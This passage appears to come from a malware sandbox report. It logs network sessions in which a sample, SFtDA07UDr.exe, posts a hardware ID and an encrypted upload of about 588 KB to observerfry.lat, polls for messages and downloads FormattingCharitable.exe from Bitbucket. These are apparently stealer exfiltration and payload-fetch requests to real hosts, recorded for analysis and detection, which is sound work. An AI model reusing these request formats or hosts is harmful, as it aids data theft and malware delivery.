2024-12-24 10:22:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:27 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ND0VHYYE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1217 Host: observerfry.lat
2024-12-24 10:22:27 UTC	1217	OUT	Data Raw: 2d 2d 4e 44 30 56 48 59 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 30 41 42 35 34 33 30 37 36 41 42 36 41 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4e 44 30 56 48 59 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 44 30 56 48 59 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 44 30 56 48 59 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --ND0VHYYEContent-Disposition: form-data; name="hwid"970AB543076AB6A1BEBA0C6A975F1733--ND0VHYYEContent-Disposition: form-data; name="pid"1--ND0VHYYEContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ND0VHYYEContent-Di
2024-12-24 10:22:28 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cipl3v1cdav3pomv8783p8t80a; expires=Sat, 19 Apr 2025 04:09:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFFj2jgHVlQU7v2AUJ8Yrb6gBd%2Ftm4%2BXGT7HjrUwe0rCWfM8BkUSoNautOjuZjLb5rhMd4HzceULrwYxwbjnR%2BaIoIK%2FroKiE3X9XSr5ekBQFAtgpsd5qXyxy3XUIXdtxEo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fdececb9c43cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2011&rtt_var=762&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2123&delivery_rate=1452013&cwnd=198&unsent_bytes=0&cid=960208fe37a870c9&ts=807&x=0"
2024-12-24 10:22:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 10:22:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49738	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:29 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T0XBLR4I9QX22ADBN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587941 Host: observerfry.lat
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: 2d 2d 54 30 58 42 4c 52 34 49 39 51 58 32 32 41 44 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 30 41 42 35 34 33 30 37 36 41 42 36 41 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 30 58 42 4c 52 34 49 39 51 58 32 32 41 44 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 30 58 42 4c 52 34 49 39 51 58 32 32 41 44 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --T0XBLR4I9QX22ADBNContent-Disposition: form-data; name="hwid"970AB543076AB6A1BEBA0C6A975F1733--T0XBLR4I9QX22ADBNContent-Disposition: form-data; name="pid"1--T0XBLR4I9QX22ADBNContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: 42 d1 e0 b0 d8 ac fa 58 95 e5 98 e2 9b f7 8b da 1a cb 7c a0 3f 94 2b 76 8a 17 98 0b a6 1a 04 42 8b 5f 4a 58 e6 49 c8 43 7c d5 3a f4 42 45 bc 8e 60 a3 19 87 4b cd a9 6c 64 4c d8 61 7c 0b 11 a1 1d f5 d3 3a 22 3c 69 27 23 77 76 51 fa a2 49 62 a6 6b 6d d2 61 63 9a b5 a9 c6 e1 04 27 2d 96 2e 32 80 47 b9 9c 65 80 16 8b bb b9 40 70 db 67 8f e1 47 a6 5a 85 25 f7 a7 0d 93 57 db 42 d3 38 c0 d7 fd a9 ee 58 9f ea 81 b3 e9 78 e0 6a 5e 7d b4 87 2f 1b e0 db 66 37 7a ac dd 39 5e ca 2d 00 9a 91 30 10 b3 c1 82 43 db 1c cb b9 98 ed fd 7f a9 46 a3 36 7f b3 0c 74 d6 63 81 ff 7d 83 32 16 e7 ef 16 0b 57 4f 2c 0a 73 ef ce 06 99 c2 a1 2f 8d 86 8d 95 98 af f7 7e 5b 6d 24 20 be 07 6e 54 56 20 8b 01 31 ba a4 1c 1f 40 8f 3b 04 2e c3 7e e1 41 68 dc 2f 91 1a 1b 9f d9 e3 a8 6d 99 a0 bd Data Ascii: BX\|?+vB_JXIC\|:BE`KldLa\|:"<i'#wvQIbkmac'-.2Ge@pgGZ%WB8Xxj^}/f7z9^-0CF6tc}2WO,s/~[m$ nTV 1@;.~Ah/m
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: a0 40 ea f1 6b 04 51 ed c0 0c 84 da b1 c1 13 c9 29 df f8 43 a8 c2 42 64 fc 5b 7d e3 dc ac b5 78 37 23 0e dd 92 6b 3c 5c 77 5b 33 87 f6 53 26 72 ca 29 0b a7 7d 82 2c 8f 21 68 47 f0 42 32 e8 9f 73 19 44 ad ba 7d c6 14 d1 27 5e 6b 35 2a e0 d7 13 9b d2 ff 6e 7e 50 61 43 b2 60 72 67 25 f7 fe 60 6c 59 dd 41 04 4f db fd bb b8 e1 c7 00 68 6d bf 94 2f 89 37 1d 4e ac ad ee dc 2f de fd 04 0e 06 67 bf 0f 3d bc 3d 32 de ed 3a 78 43 f0 78 45 19 73 48 8c 1e b0 bf d1 33 54 e6 35 77 16 a8 ed 7f 35 d5 50 02 c4 5b 60 b9 4c c4 78 2e dd 31 9b 11 e6 cd 6a 43 2d 92 ff a7 0d 0d d7 56 7b 03 da 19 ad 6a 24 f0 31 fb bf bb b8 22 59 38 1c 44 93 08 2c 01 85 fd dd 96 be 43 42 c8 90 c2 4d 1e e6 57 40 86 c3 bc 00 81 20 99 1c ac b1 15 ff 25 ae 9a 55 70 3a e5 0d 9c 34 63 f4 11 36 82 27 a2 Data Ascii: @kQ)CBd[}x7#k<\w[3S&r)},!hGB2sD}'^k5*n~PaC`rg%`lYAOhm/7N/g==2:xCxEsH3T5w5P[`Lx.1jC-V{j$1"Y8D,CBMW@ %Up:4c6'
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: 19 a7 ee 88 2d b4 2d 2b 3e 86 60 7a 9f 90 52 ea 1c ef cc cf 21 a9 06 5f 4c bf e3 72 41 a7 c1 d7 40 89 9e 97 d2 84 6b fc c9 3d fe aa e6 a9 5c 0b 20 d3 0c 8a e1 e4 e5 ee 82 fe 93 cc 68 be 0b 08 0c fc 90 57 ad b2 af 2f 48 a4 24 2e ad e3 10 07 d7 ef 65 e5 22 c8 71 c8 df 4f c3 f3 d8 de 8b 29 17 64 e6 55 c0 a8 16 80 61 b8 3f 2c 1a 94 86 89 a9 e1 65 56 55 69 fd b9 c1 f4 3a c3 49 b5 82 37 0a e7 65 15 3a 57 1d a3 23 dc a1 bf 86 b2 3b e2 8f 06 17 46 d5 1e 12 ad ff 2b 6c c7 ce 4c 37 7f e1 94 2d 64 eb 82 b2 0b 34 f7 96 72 13 7a fb 5b a3 93 2c af ff 99 a1 d5 96 d3 6c a3 cb 09 bc ef 36 29 58 40 20 9c 66 bb 8c 30 7a 37 7f d8 d8 5b fc a7 8a d2 5a 82 7c ee 17 e7 7a f0 ce d5 2b 0d 2b be aa 42 dd 46 85 c9 6a c5 1b 33 de 6e 63 54 fd 12 cd 10 25 77 ac f0 39 30 9c fc 7c 84 69 Data Ascii: --+>`zR!_LrA@k=\ hW/H$.e"qO)dUa?,eVUi:I7e:W#;F+lL7-d4rz[,l6)X@ f0z7[Z\|z++BFj3ncT%w90\|i
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: d7 1f e6 07 ed 3d 90 e2 f3 a7 77 27 36 a3 74 fd 40 d3 f1 96 4c 75 86 bb c0 ce e9 0f f2 dc d8 df e6 19 e3 a9 b4 3f d3 ce 4b 1a 7f 8a 08 9d a7 70 11 fe 8c 72 fe 21 db 52 b3 00 62 a7 77 82 7a 55 c8 40 13 1b 59 86 6c 50 91 7e 2d 06 ab e6 4f 32 c9 4c 3d 7c e2 1b 62 13 07 9b 11 38 6f aa b8 fa 2e 44 5c c7 83 8b 6e d9 98 91 b6 e0 4a 56 d8 eb f1 f0 08 c1 23 ed 36 72 11 79 9f 17 7b 9c 32 3d ab d8 83 ef 9a 07 98 af 18 7e 88 45 87 a3 5d e9 92 a1 a3 8f 63 35 0f 65 c3 35 e7 c8 99 ee cc 26 52 74 88 1f a6 b7 c8 d1 1e 71 39 3c a3 14 dd 11 d4 10 30 69 a8 d8 a1 95 75 ea 12 c3 14 b6 fb 39 60 19 c7 ee 13 24 f9 60 de d7 e0 cd a7 0b 67 c9 29 62 a8 d2 72 c4 80 3b 2a e9 23 23 e8 64 59 f1 d5 3b b8 f8 2a d1 78 3f fc c5 28 7e 64 e1 95 64 46 7c 0e d9 28 73 4c 85 5f ec a3 5b 8b e4 03 Data Ascii: =w'6t@Lu?Kpr!RbwzU@YlP~-O2L=\|b8o.D\nJV#6ry{2=~E]c5e5&Rtq9<0iu9`$`g)br;##dY;x?(~ddF\|(sL_[
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: 5a da 85 d9 f9 6d 5d c2 a5 f9 41 f7 e4 b6 2f cd 11 54 d8 ca a0 63 9c e2 c7 be 24 49 14 43 f9 2b 65 a6 9a 54 3f fa da f2 df a3 49 c3 ac ed 2b 0b 39 e4 a7 61 1a 28 81 2e 87 b3 bc f8 e1 2b 2f 3b 84 b3 f2 2d 20 62 35 11 56 bc 56 ab 53 b3 dd b3 e4 96 b2 d7 ed 01 00 fb a2 55 08 ab 82 35 52 cb 1f e5 8e 4d 60 6f a7 b4 b6 a8 8c 4d 5b 75 3b 9d 3c 86 5f c7 6f a9 98 19 8a 5c 88 b7 1f 71 c2 bc 7f 48 60 08 b3 b0 b3 11 a2 ad 75 30 84 e1 5d f5 cd 75 50 c0 77 84 0b 0b f1 c4 a2 13 f2 85 5c 61 ea 69 da 42 f7 85 33 46 2a c1 e7 33 1a 22 3c 10 4b 06 4b ad ec f8 aa c3 11 db bc b5 2b 29 cd c2 89 79 eb 59 74 40 fb c7 28 46 be ea e1 5d 84 26 5a 29 2d 08 d9 48 95 0f d3 2c 95 5e e9 41 25 d1 51 8a d3 00 31 73 66 04 cf 0b 83 ab a4 41 d1 07 7c d1 7c 46 62 75 4f 8e c3 53 62 e7 85 31 b6 Data Ascii: Zm]A/Tc$IC+eT?I+9a(.+/;- b5VVSU5RM`oM[u;<_o\qH`u0]uPw\aiB3F*3"<KK+)yYt@(F]&Z)-H,^A%Q1sfA\|\|FbuOSb1
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: cd 08 31 25 7e 20 44 25 a7 67 9f 6b c3 46 a6 e5 cc 7b 88 07 4e df 4a 1f 72 29 07 f4 0b 56 04 20 32 be dd d3 31 25 cf be a2 57 1e 42 2f 94 2d 18 e1 d0 10 14 a8 e8 da 5a 17 2b 6b a7 0e 3d 2b 50 56 06 c6 e1 64 e7 eb d5 0a 42 5c 80 12 dd d7 ed c5 1b a7 da 2d 1e db d4 d7 26 80 be b4 ef f6 0b 08 fe e2 fe 13 17 f4 c5 d3 1b d1 bf 1a ec 8c 1f b6 30 63 ef 76 0b 58 6d 17 79 e2 f6 70 8d ed d6 ea 7b 21 d0 14 11 fc af 3c d0 c3 0d 77 65 1e 05 aa b7 11 2a 9f e6 07 5d 3c 18 5a b3 3f 2c c4 e2 e8 37 44 53 b9 e1 38 25 1b 30 16 68 88 09 35 bf 10 9f 9c 40 f1 b1 b3 51 b4 fd 6c 2d 61 07 eb 11 a5 b6 ed 1b 87 68 38 f0 ac 03 3f f0 33 1c c3 7c 06 ad 7a 4c 55 f0 d9 d2 c2 31 3d 45 b8 01 25 ec c7 df 9b a4 91 51 e6 3f 98 5a 17 c2 bb d6 21 8e 80 8a 23 3b 4f ed 6b 28 94 5e 72 22 ae bb 6e Data Ascii: 1%~ D%gkF{NJr)V 21%WB/-Z+k=+PVdB\-&0cvXmyp{!<we*]<Z?,7DS8%0h5@Ql-ah8?3\|zLU1=E%Q?Z!#;Ok(^r"n
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: ab 87 94 68 ea df e2 0a c3 d1 f6 09 2d 6c b3 15 a7 cd 6a a0 24 7f d9 76 25 45 eb 41 cb e2 13 7d 83 da 46 4e 6b c5 28 c3 62 e5 8c 1e 97 b5 e0 73 b3 bd e7 4b cb da ef a1 3f d7 f8 57 9e 71 02 bc a9 38 eb 86 21 63 5a 01 c9 87 8a 4b b5 b5 63 2b b0 07 9b 7b be a2 2b 05 5a 5b f4 b7 24 24 12 1a d1 05 7b 7f 0c 89 76 6e 05 1d 74 e7 f4 70 2f 01 1f b3 bd 95 9e b8 41 24 23 0c 62 11 7a a1 30 c1 69 46 9c 42 b9 62 ae d1 c6 cc 57 7e 50 9c c8 62 71 ac 87 17 da 73 17 bc a9 8a 9c 83 a9 a3 31 e3 b1 99 51 a9 33 a4 95 70 13 00 2b 5c 6e 3e 49 d5 66 fb d4 2f c4 85 3c c2 2c 6c 0d 8c a7 ba bb c8 57 29 83 91 d0 21 6f 0a 33 75 e5 d9 7c 70 67 cb 80 13 73 33 3d 50 ad c6 00 a7 e6 3d 4f 51 84 28 45 99 11 ad 55 3e c0 7b 48 e8 de c2 e8 fd 91 2b d4 86 85 09 69 21 8c 6b fd c1 a4 4f 40 e3 84 Data Ascii: h-lj$v%EA}FNk(bsK?Wq8!cZKc+{+Z[$${vntp/A$#bz0iFBbW~Pbqs1Q3p+\n>If/<,lW)!o3u\|pgs3=P=OQ(EU>{H+i!kO@
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: 05 09 a5 03 19 3a b6 62 8b 6e 75 37 00 71 68 f8 ff 8d 63 fd df 97 fc 05 9f 7f 5f fc 49 80 6e 08 83 31 01 06 f6 89 2a 44 a9 12 15 09 c0 f6 eb 08 63 ae 04 12 89 44 8c 3b 73 61 c9 db 99 0f 1d 7f 75 64 55 74 97 73 ef 1f ad c9 80 b0 b4 48 41 af f3 1c 54 f3 34 43 b2 a0 01 30 fb 21 75 f4 de 4e 47 20 22 52 2a 42 99 6d a0 64 31 26 ef 87 29 63 31 09 bc 47 c3 8f d0 b7 66 01 11 ce 6a 20 a1 18 f7 c8 64 ef 5d 17 f1 2d ca 29 96 22 cc 3e 29 2f 40 3c 45 aa 78 71 cf 45 71 eb c1 23 d8 7f 4b 04 8c e2 89 1e f2 30 06 96 40 a9 b2 65 0f 80 9f a5 c8 7f 4d c2 84 36 ce 95 e6 10 31 25 c2 a3 e9 64 32 f9 6e a7 56 43 23 e1 f7 9e 9f 36 fb b2 b3 84 f7 0b 99 c8 e2 ca 81 75 fc b1 c3 42 a7 27 cd 62 89 39 f5 15 3e ee dc 2f bc f9 e4 12 3e d0 23 5c ab 56 c9 d5 5b 4e ee b4 92 8f 98 7d 5e 8a ba Data Ascii: :bnu7qhc_In1DcD;saudUtsHAT4C0!uNG "RBmd1&)c1Gfj d]-)">)/@<ExqEq#K0@eM61%d2nVC#6uB'b9>/>#\V[N}^
2024-12-24 10:22:29 UTC	15331	OUT	Data Raw: 2b 22 0d 14 28 ad c9 8e 83 d1 a3 ff 9c a4 68 1e 00 4a cc 52 6a e7 11 8c 27 3f f5 e5 fa b1 1e 31 36 92 fa 5e 8d 75 0c d9 9a 65 6b e0 ee cc eb 95 c3 b0 ff ba ef 1c c2 18 31 91 76 05 f2 11 56 09 40 0d 39 fe 8a d1 b0 ff b6 a0 e2 72 36 2e ba ba c3 b3 0d d3 25 0d f7 40 7d 42 60 29 1d ab 10 1d 66 c0 45 8c 00 bd 67 03 e8 73 7d 79 13 d5 1d a2 29 27 e3 38 a8 9f dd c2 15 55 d4 6d 79 b1 cb f5 59 ea 55 a0 00 d1 9d 56 63 83 fa be d3 39 46 d4 c5 98 0a c4 57 9b c2 77 2d 09 9b 9a 26 42 05 68 6b 0b 12 7e 95 20 72 f5 25 ae 68 64 46 a5 ab f1 c3 5c 59 c7 b2 f4 bc 98 18 35 0f 68 75 cf 59 ac 4f 58 18 0b d9 5d e2 05 e1 8e 7a c7 6f 89 cf 74 13 ce 04 94 08 df 20 39 fa 09 d7 13 7b 82 87 ab 40 63 1b 29 80 f3 5d 27 34 99 d2 f9 90 66 b7 de fc 88 16 1d 11 1d 9a c0 b2 0f ce ef f8 2a 3e Data Ascii: +"(hJRj'?16^uek1vV@9r6.%@}B`)fEgs}y)'8UmyYUVc9FWw-&Bhk~ r%hdF\Y5huYOX]zot 9{@c)]'4f*>
2024-12-24 10:22:34 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p4m1b008cit6mueiospv9hg068; expires=Sat, 19 Apr 2025 04:09:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=518y1lfKDQgqYEfz6aD8dOCH0vNkFBGlYrOHi%2B9EyokIDLmSba9iMYHUrbKfScjmKlSgehVX%2FmNOXe9gwDI0emMUyMFifAFhl7AqRMbI4sBhhLy10TDgUlCJ4LT7upfEDkQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fdede5c279e16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1935&rtt_var=737&sent=370&recv=613&lost=0&retrans=0&sent_bytes=2835&recv_bytes=590530&delivery_rate=1472516&cwnd=189&unsent_bytes=0&cid=9e0fceaa9152bee8&ts=4762&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49742	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:36 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: observerfry.lat
2024-12-24 10:22:36 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 39 37 30 41 42 35 34 33 30 37 36 41 42 36 41 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=970AB543076AB6A1BEBA0C6A975F1733
2024-12-24 10:22:37 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a5d2np2si6bjuopgiavkjp0aoi; expires=Sat, 19 Apr 2025 04:09:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PW0AUlcaqsNH%2F2deF8PuKFDt9v%2Bl2EB5PYuecHZqwfkh58c0FwDC70kQu0EweDbbIoXQCpylEp1Yi122uqL5PieogIdjzbA7XM2que7e3rW6yS%2BmmVaFCQyJlA42PqWcBuQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fdf07f8f372b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2026&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1441263&cwnd=172&unsent_bytes=0&cid=37cdf418484ab7ff&ts=781&x=0"
2024-12-24 10:22:37 UTC	246	IN	Data Raw: 31 31 30 0d 0a 59 6f 43 67 6a 51 73 7a 53 4d 64 41 4d 74 61 42 56 56 64 41 6f 7a 66 31 69 44 2b 38 77 52 55 6f 45 51 55 63 57 50 69 68 66 5a 38 35 2b 34 4c 34 4b 51 6c 71 72 7a 52 47 70 76 4a 76 43 32 2f 2f 47 4a 66 68 53 39 36 30 64 6b 4e 30 63 54 49 33 69 73 59 68 73 41 2f 35 7a 75 68 38 52 43 65 31 4b 30 47 6d 34 44 59 79 63 5a 45 45 78 72 6b 4e 34 4f 35 6d 53 33 39 68 51 48 65 63 7a 67 72 78 44 75 2f 42 36 58 68 76 5a 34 45 76 51 4c 76 67 49 53 4d 70 7a 56 43 32 34 46 37 4f 71 47 46 4a 63 32 6c 35 64 70 33 5a 47 4c 31 4f 6f 73 62 35 4b 51 6c 34 36 32 4a 58 39 4c 74 6b 4b 6d 7a 59 46 59 43 71 42 5a 36 70 59 56 78 68 50 30 42 33 70 49 35 4d 70 31 65 75 6b 72 77 2b 48 58 6e 32 63 78 7a 6e 74 77 6c 34 4c 38 56 52 71 61 64 62 32 Data Ascii: 110YoCgjQszSMdAMtaBVVdAozf1iD+8wRUoEQUcWPihfZ85+4L4KQlqrzRGpvJvC2//GJfhS960dkN0cTI3isYhsA/5zuh8RCe1K0Gm4DYycZEExrkN4O5mS39hQHeczgrxDu/B6XhvZ4EvQLvgISMpzVC24F7OqGFJc2l5dp3ZGL1Oosb5KQl462JX9LtkKmzYFYCqBZ6pYVxhP0B3pI5Mp1eukrw+HXn2cxzntwl4L8VRqadb2
2024-12-24 10:22:37 UTC	33	IN	Data Raw: 61 63 37 54 57 6c 67 50 6e 54 61 78 77 6d 39 57 4c 43 4d 72 32 34 52 63 76 59 39 62 77 3d 3d 0d 0a Data Ascii: ac7TWlgPnTaxwm9WLCMr24RcvY9bw==
2024-12-24 10:22:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	185.166.143.48	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:39 UTC	248	OUT	GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bitbucket.org
2024-12-24 10:22:39 UTC	5943	IN	HTTP/1.1 302 Found Date: Tue, 24 Dec 2024 10:22:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J [TRUNCATED] Expires: Tue, 24 Dec 2024 10:22:39 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 78ff50097b40 X-Version: c9b3998323c0 X-Static-Version: c9b3998323c0 X-Request-Count: 648 X-Render-Time: 0.0648660659790039 X-B3-Traceid: 3d7efce767574a9096271cb7d5780696 X-B3-Spanid: 553b986db93f30c7 X-Frame-Options: SAMEORIGIN Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; connect-src bitbucket.org .bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian [TRUNCATED] X-Usage-Quota-Remaining: 998319.886 X-Usage-Request-Cost: 1004.87 X-Usage-User-Time: 0.030146 X-Usage-System-Time: 0.000000 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff 